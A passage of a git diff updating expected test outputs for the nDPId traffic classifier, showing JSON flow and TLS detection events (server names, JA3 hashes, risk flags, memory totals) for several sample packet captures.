-02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128
","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":182,"packets-processed":182,"total-skipped-flows":0,"total-l4-payload-len":105569,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1553619149372} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 182/182 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5915559 bytes -~~ total memory freed........: 5915559 bytes -~~ total allocations/frees...: 118358/118358 +~~ total memory allocated....: 6049193 bytes +~~ total memory freed........: 6049193 bytes +~~ total allocations/frees...: 121120/121120 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2434 chars 
diff --git a/test/results/tls_port_80.pcapng.out b/test/results/tls_port_80.pcapng.out index 7a7b37c5d..379204a09 100644 --- a/test/results/tls_port_80.pcapng.out +++ b/test/results/tls_port_80.pcapng.out 
@@ -4,8 +4,8 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} 
-01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01227{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01227{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":1605,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1618744633908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871981 bytes -~~ total memory freed........: 5871981 bytes -~~ total allocations/frees...: 118133/118133 +~~ total memory allocated....: 6005615 bytes +~~ total memory freed........: 6005615 bytes +~~ total allocations/frees...: 120895/120895 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1232 chars diff --git a/test/results/tls_torrent.pcapng.out b/test/results/tls_torrent.pcapng.out index 1cf445c7b..7df769596 100644 --- a/test/results/tls_torrent.pcapng.out +++ b/test/results/tls_torrent.pcapng.out 
@@ -4,10 +4,10 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} 
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","server_names":"*.utorrent.com,utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"CN=*.utorrent.com","fingerprint":"E4:8F:E4:15:C7:D0:B7:EA:E6:F6:B1:B4:40:F0:13:D1:5E:7F:64:E8"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1639054407415,"flow_last_seen":1639054407576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5906,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1639054407576,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.BitTorrent","breed":"Acceptable","category":"Download"},"tls": 